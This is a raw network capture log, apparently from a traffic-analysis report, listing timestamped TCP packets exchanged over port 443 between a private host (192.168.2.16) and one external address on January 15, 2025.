                                                                                              Jan 15, 2025 19:42:01.219103098 CET59097443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.219142914 CET59097443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.219326973 CET59097443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.219326973 CET59097443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.219343901 CET44359097188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.219393969 CET59097443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.245505095 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.245527029 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.245702028 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.245733023 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.245866060 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.246197939 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.246212006 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.246284962 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.246298075 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.246362925 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.246551991 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.246567011 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.246642113 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.246649981 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.246695995 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.247113943 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.247132063 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.247191906 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.247204065 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.247246981 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.247559071 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.247572899 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.247637033 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.247644901 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.247694016 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.248867035 CET44359098188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.248888969 CET44359098188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.248912096 CET44359098188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.248929024 CET44359098188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.248938084 CET44359098188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.248945951 CET59098443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.248961926 CET44359098188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.248991013 CET59098443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.248995066 CET44359098188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.249039888 CET59098443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.250036001 CET44359098188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.250049114 CET44359098188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.250070095 CET44359098188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.250092983 CET44359098188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.250135899 CET59098443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.250143051 CET44359098188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.250183105 CET59098443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.295965910 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.295989990 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.296068907 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.296103001 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.296175003 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.296268940 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.296283007 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.296361923 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.296371937 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.296412945 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.297027111 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.297040939 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.297157049 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.297163963 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.297215939 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.330210924 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.330235004 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.330399036 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.330425978 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.330487967 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.330591917 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.330607891 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.330699921 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.330705881 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.330754995 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.330935001 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.330950022 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.331010103 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.331017017 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.331049919 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.331075907 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.331294060 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.331322908 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.331365108 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.331371069 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.331408024 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.331430912 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.331785917 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.331806898 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.331875086 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.331882000 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.331957102 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.342109919 CET44359099188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.342329025 CET59099443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.342361927 CET44359099188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.342802048 CET44359099188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.343091011 CET59099443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.343173027 CET44359099188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.343231916 CET59099443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.368953943 CET44359098188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.368988037 CET44359098188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.369072914 CET59098443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.369090080 CET44359098188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.369198084 CET59098443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.371027946 CET44359098188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.371056080 CET44359098188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.371108055 CET44359098188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.371144056 CET59098443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.371148109 CET44359098188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.371197939 CET59098443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.371216059 CET44359098188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.371273994 CET59098443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.371351004 CET59098443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.371362925 CET44359098188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.371767998 CET59108443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.371820927 CET44359108188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.371897936 CET59108443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.372277975 CET59108443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.372292042 CET44359108188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.383339882 CET44359099188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.383443117 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.383471966 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.383537054 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.383549929 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.383604050 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.383744955 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.383761883 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.383812904 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.383820057 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.383865118 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.384026051 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.384040117 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.384138107 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.384145021 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.384195089 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.398180962 CET59099443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.407437086 CET59109443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.407483101 CET44359109188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.407584906 CET59109443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.407881975 CET59109443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.407893896 CET44359109188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.416986942 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.417004108 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.417114019 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.417133093 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.417186022 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.418595076 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.418607950 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.418708086 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.418715000 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.418773890 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.418798923 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.418812990 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.418870926 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.418876886 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.418920040 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.419019938 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.419034004 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.419104099 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.419111013 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.419154882 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.419229984 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.419244051 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.419297934 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.419305086 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.419356108 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.470292091 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.470314026 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.470427990 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.470457077 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.470509052 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.470627069 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.470642090 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.470696926 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.470706940 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.470751047 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.471004009 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.471018076 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.471077919 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.471088886 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.471139908 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.503907919 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.503927946 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.504010916 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.504026890 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.504076958 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.505242109 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.505261898 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.505352974 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.505359888 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.505414009 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.505520105 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.505537033 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.505593061 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.505599976 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.505645037 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.505884886 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.505899906 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.505959034 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.505964994 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.506011963 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.506226063 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.506247044 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.506306887 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.506313086 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.506365061 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.547281981 CET44359101188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.547594070 CET59101443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.547626972 CET44359101188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.548526049 CET44359101188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.548634052 CET59101443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.548912048 CET59101443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.548966885 CET44359101188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.549072981 CET59101443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.549082041 CET44359101188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.550421000 CET44359102188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.550622940 CET59102443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.550653934 CET44359102188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.551147938 CET44359102188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.551434040 CET59102443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.551506042 CET44359102188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.551517010 CET59102443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.557512045 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.557533979 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.557596922 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.557601929 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.557634115 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.557658911 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.557707071 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.557984114 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.557996988 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.558068991 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.558078051 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.581872940 CET44359100188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.582201004 CET59100443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.582215071 CET44359100188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.582684040 CET44359100188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.583007097 CET59100443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.583086967 CET44359100188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.583189964 CET59100443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.590168953 CET59101443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.591151953 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.591175079 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.591262102 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.591294050 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.592308998 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.592323065 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.592394114 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.592403889 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.592545986 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.592565060 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.592601061 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.592612028 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.592653036 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.592839956 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.592853069 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.592910051 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.592916965 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.593158960 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.593174934 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.593254089 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.593261957 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.595340014 CET44359102188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.606174946 CET59102443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.623333931 CET44359100188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.637150049 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.644361019 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.644381046 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.644464016 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.644490004 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.644541979 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.644627094 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.644645929 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.644725084 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.644733906 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.644777060 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.644988060 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.645004034 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.645064116 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.645072937 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.645119905 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.657854080 CET44359104188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.658098936 CET44359103188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.658130884 CET59104443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.658154011 CET44359104188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.658310890 CET59103443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.658332109 CET44359103188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.658885002 CET44359103188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.659164906 CET44359104188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.659213066 CET59103443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.659250975 CET59104443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.659327984 CET44359103188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.659507990 CET59104443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.659584045 CET44359104188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.659595013 CET59103443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.659710884 CET59104443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.659717083 CET44359104188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.660643101 CET44359107188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.660785913 CET44359105188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.660832882 CET59107443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.660847902 CET44359107188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.660963058 CET59105443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.660972118 CET44359105188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.661135912 CET44359107188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.661622047 CET59107443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.661683083 CET44359107188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.661767006 CET59107443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.662065029 CET44359105188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.662133932 CET59105443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.662395000 CET59105443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.662468910 CET44359105188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.662489891 CET59105443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.676279068 CET44359099188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.676309109 CET44359099188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.676501989 CET59099443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.676532984 CET44359099188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.676553011 CET44359099188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.676599026 CET59099443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.676659107 CET59099443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.677020073 CET59099443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.677036047 CET44359099188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.678052902 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.678075075 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.678162098 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.678189039 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.678240061 CET59087443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:42:01.679028034 CET44359087188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:42:01.679049969 CET44359087188.119.66.154192.168.2.16
